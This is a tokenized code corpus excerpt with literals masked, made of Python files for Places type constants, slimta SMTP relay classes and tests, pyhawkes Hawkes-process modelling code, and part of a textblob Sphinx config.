<s> """<STR_LIT>""" <EOL> TYPE_ACCOUNTING = '<STR_LIT>' <EOL> TYPE_AIRPORT = '<STR_LIT>' <EOL> TYPE_AMUSEMENT_PARK = '<STR_LIT>' <EOL> TYPE_AQUARIUM = '<STR_LIT>' <EOL> TYPE_ART_GALLERY = '<STR_LIT>' <EOL> TYPE_ATM = '<STR_LIT>' <EOL> TYPE_BAKERY = '<STR_LIT>' <EOL> TYPE_BANK = '<STR_LIT>' <EOL> TYPE_BAR = '<STR_LIT:bar>' <EOL> TYPE_BEAUTY_SALON = '<STR_LIT>' <EOL> TYPE_BICYCLE_STORE = '<STR_LIT>' <EOL> TYPE_BOOK_STORE = '<STR_LIT>' <EOL> TYPE_BOWLING_ALLEY = '<STR_LIT>' <EOL> TYPE_BUS_STATION = '<STR_LIT>' <EOL> TYPE_CAFE = '<STR_LIT>' <EOL> TYPE_CAMPGROUND = '<STR_LIT>' <EOL> TYPE_CAR_DEALER = '<STR_LIT>' <EOL> TYPE_CAR_RENTAL = '<STR_LIT>' <EOL> TYPE_CAR_REPAIR = '<STR_LIT>' <EOL> TYPE_CAR_WASH = '<STR_LIT>' <EOL> TYPE_CASINO = '<STR_LIT>' <EOL> TYPE_CEMETERY = '<STR_LIT>' <EOL> TYPE_CHURCH = '<STR_LIT>' <EOL> TYPE_CITY_HALL = '<STR_LIT>' <EOL> TYPE_CLOTHING_STORE = '<STR_LIT>' <EOL> TYPE_CONVENIENCE_STORE = '<STR_LIT>' <EOL> TYPE_COURTHOUSE = '<STR_LIT>' <EOL> TYPE_DENTIST = '<STR_LIT>' <EOL> TYPE_DEPARTMENT_STORE = '<STR_LIT>' <EOL> TYPE_DOCTOR = '<STR_LIT>' <EOL> TYPE_ELECTRICIAN = '<STR_LIT>' <EOL> TYPE_ELECTRONICS_STORE = '<STR_LIT>' <EOL> TYPE_EMBASSY = '<STR_LIT>' <EOL> TYPE_ESTABLISHMENT = '<STR_LIT>' <EOL> TYPE_FINANCE = '<STR_LIT>' <EOL> TYPE_FIRE_STATION = '<STR_LIT>' <EOL> TYPE_FLORIST = '<STR_LIT>' <EOL> TYPE_FOOD = '<STR_LIT>' <EOL> TYPE_FUNERAL_HOME = '<STR_LIT>' <EOL> TYPE_FURNITURE_STORE = '<STR_LIT>' <EOL> TYPE_GAS_STATION = '<STR_LIT>' <EOL> TYPE_GENERAL_CONTRACTOR = '<STR_LIT>' <EOL> TYPE_GEOCODE = '<STR_LIT>' <EOL> TYPE_GROCERY_OR_SUPERMARKET = '<STR_LIT>' <EOL> TYPE_GYM = '<STR_LIT>' <EOL> TYPE_HAIR_CARE = '<STR_LIT>' <EOL> TYPE_HARDWARE_STORE = '<STR_LIT>' <EOL> TYPE_HEALTH = '<STR_LIT>' <EOL> TYPE_HINDU_TEMPLE = '<STR_LIT>' <EOL> TYPE_HOME_GOODS_STORE = '<STR_LIT>' <EOL> TYPE_HOSPITAL = '<STR_LIT>' <EOL> TYPE_INSURANCE_AGENCY = '<STR_LIT>' <EOL> TYPE_JEWELRY_STORE = '<STR_LIT>' <EOL> TYPE_LAUNDRY = '<STR_LIT>' <EOL> TYPE_LAWYER = 
'<STR_LIT>' <EOL> TYPE_LIBRARY = '<STR_LIT>' <EOL> TYPE_LIQUOR_STORE = '<STR_LIT>' <EOL> TYPE_LOCAL_GOVERNMENT_OFFICE = '<STR_LIT>' <EOL> TYPE_LOCKSMITH = '<STR_LIT>' <EOL> TYPE_LODGING = '<STR_LIT>' <EOL> TYPE_MEAL_DELIVERY = '<STR_LIT>' <EOL> TYPE_MEAL_TAKEAWAY = '<STR_LIT>' <EOL> TYPE_MOSQUE = '<STR_LIT>' <EOL> TYPE_MOVIE_RENTAL = '<STR_LIT>' <EOL> TYPE_MOVIE_THEATER = '<STR_LIT>' <EOL> TYPE_MOVING_COMPANY = '<STR_LIT>' <EOL> TYPE_MUSEUM = '<STR_LIT>' <EOL> TYPE_NIGHT_CLUB = '<STR_LIT>' <EOL> TYPE_PAINTER = '<STR_LIT>' <EOL> TYPE_PARK = '<STR_LIT>' <EOL> TYPE_PARKING = '<STR_LIT>' <EOL> TYPE_PET_STORE = '<STR_LIT>' <EOL> TYPE_PHARMACY = '<STR_LIT>' <EOL> TYPE_PHYSIOTHERAPIST = '<STR_LIT>' <EOL> TYPE_PLACE_OF_WORSHIP = '<STR_LIT>' <EOL> TYPE_PLUMBER = '<STR_LIT>' <EOL> TYPE_POLICE = '<STR_LIT>' <EOL> TYPE_POST_OFFICE = '<STR_LIT>' <EOL> TYPE_REAL_ESTATE_AGENCY = '<STR_LIT>' <EOL> TYPE_RESTAURANT = '<STR_LIT>' <EOL> TYPE_ROOFING_CONTRACTOR = '<STR_LIT>' <EOL> TYPE_RV_PARK = '<STR_LIT>' <EOL> TYPE_SCHOOL = '<STR_LIT>' <EOL> TYPE_SHOE_STORE = '<STR_LIT>' <EOL> TYPE_SHOPPING_MALL = '<STR_LIT>' <EOL> TYPE_SPA = '<STR_LIT>' <EOL> TYPE_STADIUM = '<STR_LIT>' <EOL> TYPE_STORAGE = '<STR_LIT>' <EOL> TYPE_STORE = '<STR_LIT:store>' <EOL> TYPE_SUBWAY_STATION = '<STR_LIT>' <EOL> TYPE_SYNAGOGUE = '<STR_LIT>' <EOL> TYPE_TAXI_STAND = '<STR_LIT>' <EOL> TYPE_TRAIN_STATION = '<STR_LIT>' <EOL> TYPE_TRAVEL_AGENCY = '<STR_LIT>' <EOL> TYPE_UNIVERSITY = '<STR_LIT>' <EOL> TYPE_VETERINARY_CARE = '<STR_LIT>' <EOL> TYPE_ZOO = '<STR_LIT>' <EOL> TYPE_ADMINISTRATIVE_AREA_LEVEL_1 = '<STR_LIT>' <EOL> TYPE_ADMINISTRATIVE_AREA_LEVEL_2 = '<STR_LIT>' <EOL> TYPE_ADMINISTRATIVE_AREA_LEVEL_3 = '<STR_LIT>' <EOL> TYPE_COLLOQUIAL_AREA = '<STR_LIT>' <EOL> TYPE_COUNTRY = '<STR_LIT>' <EOL> TYPE_FLOOR = '<STR_LIT>' <EOL> TYPE_INTERSECTION = '<STR_LIT>' <EOL> TYPE_LOCALITY = '<STR_LIT>' <EOL> TYPE_NATURAL_FEATURE = '<STR_LIT>' <EOL> TYPE_NEIGHBORHOOD = '<STR_LIT>' <EOL> TYPE_POLITICAL = '<STR_LIT>' <EOL> 
TYPE_POINT_OF_INTEREST = '<STR_LIT>' <EOL> TYPE_POST_BOX = '<STR_LIT>' <EOL> TYPE_POSTAL_CODE = '<STR_LIT>' <EOL> TYPE_POSTAL_CODE_PREFIX = '<STR_LIT>' <EOL> TYPE_POSTAL_TOWN = '<STR_LIT>' <EOL> TYPE_PREMISE = '<STR_LIT>' <EOL> TYPE_ROOM = '<STR_LIT>' <EOL> TYPE_ROUTE = '<STR_LIT>' <EOL> TYPE_STREET_ADDRESS = '<STR_LIT>' <EOL> TYPE_STREET_NUMBER = '<STR_LIT>' <EOL> TYPE_SUBLOCALITY = '<STR_LIT>' <EOL> TYPE_SUBLOCALITY_LEVEL_4 = '<STR_LIT>' <EOL> TYPE_SUBLOCALITY_LEVEL_5 = '<STR_LIT>' <EOL> TYPE_SUBLOCALITY_LEVEL_3 = '<STR_LIT>' <EOL> TYPE_SUBLOCALITY_LEVEL_2 = '<STR_LIT>' <EOL> TYPE_SUBLOCALITY_LEVEL_1 = '<STR_LIT>' <EOL> TYPE_SUBPREMISE = '<STR_LIT>' <EOL> TYPE_TRANSIT_STATION = '<STR_LIT>' <EOL> AC_TYPE_GEOCODE = '<STR_LIT>' <EOL> AC_TYPE_ADDDRESS = '<STR_LIT:address>' <EOL> AC_TYPE_ESTABLISHMENT = '<STR_LIT>' <EOL> AC_TYPE_REGIONS = '<STR_LIT>' <EOL> AC_TYPE_CITIES = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from slimta . core import SlimtaError <EOL> from slimta . smtp . reply import Reply <EOL> from slimta . policy import RelayPolicy <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class RelayError ( SlimtaError ) : <EOL> def __init__ ( self , msg , reply = None ) : <EOL> super ( RelayError , self ) . __init__ ( msg ) <EOL> if reply : <EOL> self . reply = reply <EOL> else : <EOL> reply_msg = '<STR_LIT:U+0020>' . join ( ( self . _default_esc , msg ) ) <EOL> self . reply = Reply ( self . _default_code , reply_msg ) <EOL> class PermanentRelayError ( RelayError ) : <EOL> """<STR_LIT>""" <EOL> _default_code = '<STR_LIT>' <EOL> _default_esc = '<STR_LIT>' <EOL> class TransientRelayError ( RelayError ) : <EOL> """<STR_LIT>""" <EOL> _default_code = '<STR_LIT>' <EOL> _default_esc = '<STR_LIT>' <EOL> class Relay ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . relay_policies = [ ] <EOL> def add_policy ( self , policy ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( policy , RelayPolicy ) : <EOL> self . relay_policies . append ( policy ) <EOL> else : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> def _run_policies ( self , envelope ) : <EOL> for policy in self . relay_policies : <EOL> policy . apply ( envelope ) <EOL> def _attempt ( self , envelope , attempts ) : <EOL> self . _run_policies ( envelope ) <EOL> return self . attempt ( envelope , attempts ) <EOL> def attempt ( self , envelope , attempts ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def kill ( self ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> import unittest2 as unittest <EOL> from slimta . envelope import Envelope <EOL> from slimta . bounce import Bounce <EOL> from slimta . smtp . reply import Reply <EOL> class TestBounce ( unittest . TestCase ) : <EOL> def test_bounce ( self ) : <EOL> env = Envelope ( '<STR_LIT>' , [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> env . parse ( b"""<STR_LIT>""" ) <EOL> reply = Reply ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> Bounce . header_template = """<STR_LIT>""" <EOL> Bounce . footer_template = """<STR_LIT>""" <EOL> bounce = Bounce ( env , reply ) <EOL> self . assertEqual ( '<STR_LIT>' , bounce . sender ) <EOL> self . assertEqual ( [ '<STR_LIT>' ] , bounce . recipients ) <EOL> self . assertEqual ( '<STR_LIT>' , bounce . headers [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( '<STR_LIT>' , bounce . headers [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( '<STR_LIT>' , bounce . headers [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( b"""<STR_LIT>""" . replace ( b'<STR_LIT:\n>' , b'<STR_LIT:\r\n>' ) , bounce . message ) <EOL> def test_bounce_headersonly ( self ) : <EOL> env = Envelope ( '<STR_LIT>' , [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> env . parse ( b"""<STR_LIT>""" ) <EOL> reply = Reply ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> Bounce . header_template = """<STR_LIT>""" <EOL> Bounce . footer_template = """<STR_LIT>""" <EOL> bounce = Bounce ( env , reply , headers_only = True ) <EOL> self . assertEqual ( '<STR_LIT>' , bounce . sender ) <EOL> self . assertEqual ( [ '<STR_LIT>' ] , bounce . recipients ) <EOL> self . assertEqual ( '<STR_LIT>' , bounce . headers [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( '<STR_LIT>' , bounce . headers [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( '<STR_LIT>' , bounce . headers [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( b"""<STR_LIT>""" . replace ( b'<STR_LIT:\n>' , b'<STR_LIT:\r\n>' ) , bounce . message ) </s>
<s> import unittest2 as unittest <EOL> from mox3 . mox import MoxTestBase <EOL> from pycares . errno import ARES_ENOTFOUND , ARES_ENODATA <EOL> from slimta . relay import PermanentRelayError <EOL> from slimta . relay . smtp . mx import MxSmtpRelay , NoDomainError <EOL> from slimta . relay . smtp . static import StaticSmtpRelay <EOL> from slimta . util . dns import DNSResolver , DNSError <EOL> from slimta . envelope import Envelope <EOL> class FakeAsyncResult ( object ) : <EOL> def __init__ ( self , answer = None ) : <EOL> self . answer = answer <EOL> def get ( self ) : <EOL> return self . answer <EOL> class FakeMxAnswer ( object ) : <EOL> def __init__ ( self , expired , rdata ) : <EOL> class FakeMxRdata ( object ) : <EOL> def __init__ ( self , priority , host ) : <EOL> self . priority = priority <EOL> self . host = host <EOL> self . ttl = float ( '<STR_LIT>' ) if expired else float ( '<STR_LIT>' ) <EOL> self . rdata = [ FakeMxRdata ( * rr ) for rr in rdata ] <EOL> def __iter__ ( self ) : <EOL> return iter ( self . rdata ) <EOL> class FakeAAnswer ( object ) : <EOL> def __init__ ( self , expired , rdata ) : <EOL> class FakeARdata ( object ) : <EOL> def __init__ ( self , address ) : <EOL> self . host = address <EOL> self . ttl = float ( '<STR_LIT>' ) if expired else float ( '<STR_LIT>' ) <EOL> self . rdata = [ FakeARdata ( * rr ) for rr in rdata ] <EOL> def __iter__ ( self ) : <EOL> return iter ( self . rdata ) <EOL> class TestMxSmtpRelay ( unittest . TestCase , MoxTestBase ) : <EOL> def test_get_rcpt_domain ( self ) : <EOL> env = Envelope ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> mx = MxSmtpRelay ( ) <EOL> self . assertEqual ( '<STR_LIT>' , mx . _get_rcpt_domain ( env ) ) <EOL> def test_get_rcpt_domain_error ( self ) : <EOL> env = Envelope ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> mx = MxSmtpRelay ( ) <EOL> self . assertRaises ( NoDomainError , mx . 
_get_rcpt_domain , env ) <EOL> def test_choose_mx ( self ) : <EOL> records = [ ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:2> , <NUM_LIT:2> ) , ( <NUM_LIT:3> , <NUM_LIT:3> ) , ( <NUM_LIT:4> , <NUM_LIT:4> ) , ( <NUM_LIT:5> , <NUM_LIT:5> ) ] <EOL> mx = MxSmtpRelay ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , mx . choose_mx ( records , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( <NUM_LIT:5> , mx . choose_mx ( records , <NUM_LIT:4> ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , mx . choose_mx ( records , <NUM_LIT:5> ) ) <EOL> self . assertEqual ( <NUM_LIT:3> , mx . choose_mx ( records , <NUM_LIT:7> ) ) <EOL> self . assertEqual ( <NUM_LIT:2> , mx . choose_mx ( records , <NUM_LIT> ) ) <EOL> def test_attempt ( self ) : <EOL> env = Envelope ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> mx_ret = FakeMxAnswer ( False , [ ( <NUM_LIT:5> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:10> , '<STR_LIT>' ) ] ) <EOL> mx = MxSmtpRelay ( ) <EOL> static = self . mox . CreateMock ( StaticSmtpRelay ) <EOL> self . mox . StubOutWithMock ( mx , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( DNSResolver , '<STR_LIT>' ) <EOL> DNSResolver . query ( '<STR_LIT>' , '<STR_LIT>' ) . AndReturn ( FakeAsyncResult ( mx_ret ) ) <EOL> mx . new_static_relay ( '<STR_LIT>' , <NUM_LIT> ) . AndReturn ( static ) <EOL> static . attempt ( env , <NUM_LIT:0> ) <EOL> mx . new_static_relay ( '<STR_LIT>' , <NUM_LIT> ) . AndReturn ( static ) <EOL> static . attempt ( env , <NUM_LIT:1> ) <EOL> self . mox . ReplayAll ( ) <EOL> mx . attempt ( env , <NUM_LIT:0> ) <EOL> mx . attempt ( env , <NUM_LIT:1> ) <EOL> def test_attempt_no_mx ( self ) : <EOL> env = Envelope ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> a_ret = FakeAAnswer ( False , [ ( '<STR_LIT>' , ) ] ) <EOL> mx = MxSmtpRelay ( ) <EOL> static = self . mox . CreateMock ( StaticSmtpRelay ) <EOL> self . mox . StubOutWithMock ( mx , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( DNSResolver , '<STR_LIT>' ) <EOL> DNSResolver . query ( '<STR_LIT>' , '<STR_LIT>' ) . 
AndRaise ( DNSError ( ARES_ENOTFOUND ) ) <EOL> DNSResolver . query ( '<STR_LIT>' , '<STR_LIT:A>' ) . AndReturn ( FakeAsyncResult ( a_ret ) ) <EOL> mx . new_static_relay ( '<STR_LIT>' , <NUM_LIT> ) . AndReturn ( static ) <EOL> static . attempt ( env , <NUM_LIT:0> ) <EOL> self . mox . ReplayAll ( ) <EOL> mx . attempt ( env , <NUM_LIT:0> ) <EOL> def test_attempt_no_records ( self ) : <EOL> env = Envelope ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> mx = MxSmtpRelay ( ) <EOL> self . mox . StubOutWithMock ( mx , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( DNSResolver , '<STR_LIT>' ) <EOL> DNSResolver . query ( '<STR_LIT>' , '<STR_LIT>' ) . AndRaise ( DNSError ( ARES_ENOTFOUND ) ) <EOL> DNSResolver . query ( '<STR_LIT>' , '<STR_LIT:A>' ) . AndRaise ( DNSError ( ARES_ENOTFOUND ) ) <EOL> self . mox . ReplayAll ( ) <EOL> with self . assertRaises ( PermanentRelayError ) : <EOL> mx . attempt ( env , <NUM_LIT:0> ) <EOL> def test_attempt_expiredmx ( self ) : <EOL> env = Envelope ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> mx_ret = FakeMxAnswer ( True , [ ( <NUM_LIT:10> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:5> , '<STR_LIT>' ) ] ) <EOL> mx = MxSmtpRelay ( ) <EOL> static = self . mox . CreateMock ( StaticSmtpRelay ) <EOL> self . mox . StubOutWithMock ( mx , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( DNSResolver , '<STR_LIT>' ) <EOL> DNSResolver . query ( '<STR_LIT>' , '<STR_LIT>' ) . AndReturn ( FakeAsyncResult ( mx_ret ) ) <EOL> mx . new_static_relay ( '<STR_LIT>' , <NUM_LIT> ) . AndReturn ( static ) <EOL> static . attempt ( env , <NUM_LIT:0> ) <EOL> DNSResolver . query ( '<STR_LIT>' , '<STR_LIT>' ) . AndReturn ( FakeAsyncResult ( mx_ret ) ) <EOL> mx . new_static_relay ( '<STR_LIT>' , <NUM_LIT> ) . AndReturn ( static ) <EOL> static . attempt ( env , <NUM_LIT:1> ) <EOL> self . mox . ReplayAll ( ) <EOL> mx . attempt ( env , <NUM_LIT:0> ) <EOL> mx . 
attempt ( env , <NUM_LIT:1> ) <EOL> def test_attempt_force_mx ( self ) : <EOL> env = Envelope ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> mx = MxSmtpRelay ( ) <EOL> static = self . mox . CreateMock ( StaticSmtpRelay ) <EOL> self . mox . StubOutWithMock ( mx , '<STR_LIT>' ) <EOL> mx . new_static_relay ( '<STR_LIT>' , <NUM_LIT> ) . AndReturn ( static ) <EOL> static . attempt ( env , <NUM_LIT:0> ) <EOL> static . attempt ( env , <NUM_LIT:1> ) <EOL> self . mox . ReplayAll ( ) <EOL> mx . force_mx ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> mx . attempt ( env , <NUM_LIT:0> ) <EOL> mx . attempt ( env , <NUM_LIT:1> ) <EOL> def test_attempt_no_answer ( self ) : <EOL> env = Envelope ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> mx = MxSmtpRelay ( ) <EOL> self . mox . StubOutWithMock ( mx , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( DNSResolver , '<STR_LIT>' ) <EOL> DNSResolver . query ( '<STR_LIT>' , '<STR_LIT>' ) . AndRaise ( DNSError ( ARES_ENODATA ) ) <EOL> DNSResolver . query ( '<STR_LIT>' , '<STR_LIT:A>' ) . AndRaise ( DNSError ( ARES_ENODATA ) ) <EOL> self . mox . ReplayAll ( ) <EOL> with self . assertRaises ( PermanentRelayError ) : <EOL> mx . attempt ( env , <NUM_LIT:0> ) </s>
<s> import numpy as np <EOL> np . random . seed ( <NUM_LIT> ) <EOL> np . seterr ( over = "<STR_LIT>" ) <EOL> import matplotlib . pyplot as plt <EOL> from pybasicbayes . util . general import ibincount <EOL> from pybasicbayes . util . text import progprint_xrange <EOL> import pyhawkes . models <EOL> reload ( pyhawkes . models ) <EOL> K = <NUM_LIT:10> <EOL> B = <NUM_LIT:3> <EOL> dt = <NUM_LIT:1> <EOL> dt_max = <NUM_LIT> <EOL> T = <NUM_LIT> <EOL> network_hypers = { '<STR_LIT>' : <NUM_LIT:1.> , '<STR_LIT:p>' : <NUM_LIT:1.> , '<STR_LIT:v>' : <NUM_LIT> } <EOL> dt_model = pyhawkes . models . DiscreteTimeNetworkHawkesModelSpikeAndSlab ( K = K , dt = dt , dt_max = dt_max , B = B , <EOL> network_hypers = network_hypers ) <EOL> assert dt_model . check_stability ( ) <EOL> S_dt , _ = dt_model . generate ( T = int ( np . ceil ( T / dt ) ) , keep = False ) <EOL> print "<STR_LIT>" , S_dt . sum ( ) , "<STR_LIT>" <EOL> print "<STR_LIT>" , dt_model . heldout_log_likelihood ( S_dt ) <EOL> S_ct = dt * np . concatenate ( [ ibincount ( S ) for S in S_dt . T ] ) . astype ( float ) <EOL> S_ct += dt * np . random . rand ( * S_ct . shape ) <EOL> assert np . all ( S_ct < T ) <EOL> C_ct = np . concatenate ( [ k * np . ones ( S . sum ( ) ) for k , S in enumerate ( S_dt . T ) ] ) . astype ( int ) <EOL> perm = np . argsort ( S_ct ) <EOL> S_ct = S_ct [ perm ] <EOL> C_ct = C_ct [ perm ] <EOL> ct_model = pyhawkes . models . ContinuousTimeNetworkHawkesModel ( K , dt_max = <NUM_LIT:1.> , <EOL> network_hypers = network_hypers ) <EOL> ct_model . add_data ( S_ct , C_ct , T ) <EOL> ct_model . bias_model . lambda0 = dt_model . bias_model . lambda0 <EOL> ct_model . weight_model . A = dt_model . weight_model . A <EOL> ct_model . weight_model . W = dt_model . weight_model . W <EOL> print "<STR_LIT>" , ct_model . heldout_log_likelihood ( S_ct , C_ct , T ) <EOL> ct_lls = [ ct_model . 
log_likelihood ( ) ] <EOL> N_samples = <NUM_LIT:100> <EOL> for itr in progprint_xrange ( N_samples , perline = <NUM_LIT> ) : <EOL> ct_model . resample_model ( ) <EOL> ct_lls . append ( ct_model . log_likelihood ( ) ) <EOL> assert np . all ( ct_model . weight_model . A == <NUM_LIT:1> ) <EOL> dt_model_test = pyhawkes . models . DiscreteTimeNetworkHawkesModelSpikeAndSlab ( K = K , dt = dt , dt_max = dt_max , B = B , <EOL> network_hypers = network_hypers ) <EOL> dt_model_test . add_data ( S_dt ) <EOL> dt_lls = [ ] <EOL> for itr in progprint_xrange ( N_samples , perline = <NUM_LIT> ) : <EOL> dt_model_test . resample_model ( ) <EOL> dt_lls . append ( dt_model_test . log_likelihood ( ) ) <EOL> assert np . all ( dt_model_test . weight_model . A == <NUM_LIT:1> ) <EOL> plt . figure ( ) <EOL> plt . plot ( ct_lls , '<STR_LIT:b>' ) <EOL> plt . plot ( dt_lls , '<STR_LIT:r>' ) <EOL> plt . show ( ) </s>
<s> import os <EOL> import abc <EOL> import numpy as np <EOL> import scipy . linalg <EOL> import scipy . signal as sig <EOL> class Basis ( object ) : <EOL> __metaclass__ = abc . ABCMeta <EOL> def __init__ ( self , B , dt , dt_max , <EOL> orth = False , <EOL> norm = False , <EOL> allow_instantaneous = False ) : <EOL> self . B = B <EOL> self . dt = dt <EOL> self . dt_max = dt_max <EOL> self . orth = orth <EOL> self . norm = norm <EOL> self . allow_instantaneous = allow_instantaneous <EOL> self . basis = self . interpolate_basis ( self . create_basis ( ) , self . dt , self . dt_max , self . norm ) <EOL> self . L = self . basis . shape [ <NUM_LIT:0> ] <EOL> @ abc . abstractmethod <EOL> def create_basis ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def convolve_with_basis ( self , S ) : <EOL> """<STR_LIT>""" <EOL> ( T , K ) = S . shape <EOL> ( R , B ) = self . basis . shape <EOL> F = np . empty ( ( T , K , B ) ) <EOL> for b in np . arange ( B ) : <EOL> F [ : , : , b ] = sig . fftconvolve ( S , <EOL> np . reshape ( self . basis [ : , b ] , ( R , <NUM_LIT:1> ) ) , <EOL> '<STR_LIT>' ) [ : T , : ] <EOL> if np . amin ( self . basis ) >= <NUM_LIT:0> and np . amin ( S ) >= <NUM_LIT:0> : <EOL> np . clip ( F , <NUM_LIT:0> , np . inf , out = F ) <EOL> assert np . amin ( F ) >= <NUM_LIT:0> , "<STR_LIT>" <EOL> return F <EOL> def interpolate_basis ( self , basis , dt , dt_max , <EOL> norm = True ) : <EOL> L , B = basis . shape <EOL> t_int = np . arange ( <NUM_LIT:0.0> , dt_max , step = dt ) <EOL> t_bas = np . linspace ( <NUM_LIT:0.0> , dt_max , L ) <EOL> ibasis = np . zeros ( ( len ( t_int ) , B ) ) <EOL> for b in np . arange ( B ) : <EOL> ibasis [ : , b ] = np . interp ( t_int , t_bas , basis [ : , b ] ) <EOL> if norm : <EOL> ibasis /= ( dt * np . sum ( ibasis , axis = <NUM_LIT:0> ) ) <EOL> if not self . allow_instantaneous : <EOL> ibasis = np . vstack ( ( np . 
zeros ( ( <NUM_LIT:1> , B ) ) , ibasis ) ) <EOL> return ibasis <EOL> def create_basis ( self ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> class CosineBasis ( Basis ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , <EOL> B , dt , dt_max , <EOL> orth = False , <EOL> norm = True , <EOL> allow_instantaneous = False , <EOL> n_eye = <NUM_LIT:0> , <EOL> a = <NUM_LIT:1.0> / <NUM_LIT> , <EOL> b = <NUM_LIT:0.5> , <EOL> L = <NUM_LIT:100> ) : <EOL> self . n_eye = n_eye <EOL> self . a = a <EOL> self . b = b <EOL> self . L = L <EOL> super ( CosineBasis , self ) . __init__ ( B , dt , dt_max , orth , norm , allow_instantaneous ) <EOL> def create_basis ( self ) : <EOL> n_pts = self . L <EOL> n_cos = self . B - self . n_eye <EOL> n_eye = self . n_eye <EOL> assert n_cos >= <NUM_LIT:0> and n_eye >= <NUM_LIT:0> <EOL> n_bas = n_eye + n_cos <EOL> basis = np . zeros ( ( n_pts , n_bas ) ) <EOL> basis [ : n_eye , : n_eye ] = np . eye ( n_eye ) <EOL> a = self . a <EOL> b = self . b <EOL> nlin = lambda t : np . log ( a * t + b ) <EOL> u_ir = nlin ( np . arange ( n_pts ) ) <EOL> ctrs = u_ir [ np . floor ( np . linspace ( n_eye , ( n_pts / <NUM_LIT> ) , n_cos ) ) . astype ( np . int ) ] <EOL> if len ( ctrs ) == <NUM_LIT:1> : <EOL> w = ctrs / <NUM_LIT:2> <EOL> else : <EOL> w = ( ctrs [ - <NUM_LIT:1> ] - ctrs [ <NUM_LIT:0> ] ) / ( n_cos - <NUM_LIT:1> ) <EOL> basis_fn = lambda u , c , w : ( np . cos ( np . maximum ( - np . pi , np . minimum ( np . pi , ( u - c ) * np . pi / w / <NUM_LIT> ) ) ) + <NUM_LIT:1> ) / <NUM_LIT> <EOL> for i in np . arange ( n_cos ) : <EOL> basis [ : , n_eye + i ] = basis_fn ( u_ir , ctrs [ i ] , w ) <EOL> if self . orth : <EOL> basis = scipy . linalg . orth ( basis ) <EOL> if self . norm : <EOL> if np . any ( basis < <NUM_LIT:0> ) : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> basis = basis / np . tile ( np . 
sum ( basis , axis = <NUM_LIT:0> ) , [ n_pts , <NUM_LIT:1> ] ) / ( <NUM_LIT:1.0> / n_pts ) <EOL> return basis <EOL> class IdentityBasis ( Basis ) : <EOL> def __init__ ( self , <EOL> dt , dt_max , <EOL> norm = True , <EOL> allow_instantaneous = False ) : <EOL> self . dt = dt <EOL> self . dt_max = dt_max <EOL> self . allow_instantaneous = allow_instantaneous <EOL> self . norm = norm <EOL> self . B = int ( dt_max // dt ) <EOL> if allow_instantaneous : <EOL> self . B += <NUM_LIT:1> <EOL> self . L = dt_max // dt + <NUM_LIT:1> <EOL> self . basis = self . create_basis ( ) <EOL> def create_basis ( self ) : <EOL> ibasis = np . eye ( self . B ) <EOL> if not self . allow_instantaneous : <EOL> ibasis = np . vstack ( ( np . zeros ( ( <NUM_LIT:1> , self . B ) ) , ibasis ) ) <EOL> assert ibasis . shape == ( self . L , self . B ) <EOL> if self . norm : <EOL> ibasis /= ( self . dt * np . sum ( ibasis , axis = <NUM_LIT:0> ) ) <EOL> return ibasis </s>
<s> import datetime as dt <EOL> import os <EOL> import sys <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT:..>' ) ) <EOL> import textblob <EOL> sys . path . append ( os . path . abspath ( "<STR_LIT>" ) ) <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> primary_domain = '<STR_LIT>' <EOL> default_role = '<STR_LIT>' <EOL> issues_github_path = '<STR_LIT>' <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' . format ( <EOL> dt . datetime . utcnow ( ) <EOL> ) <EOL> version = release = textblob . __version__ <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT>' <EOL> html_theme_path = [ '<STR_LIT>' ] <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> html_sidebars = { <EOL> 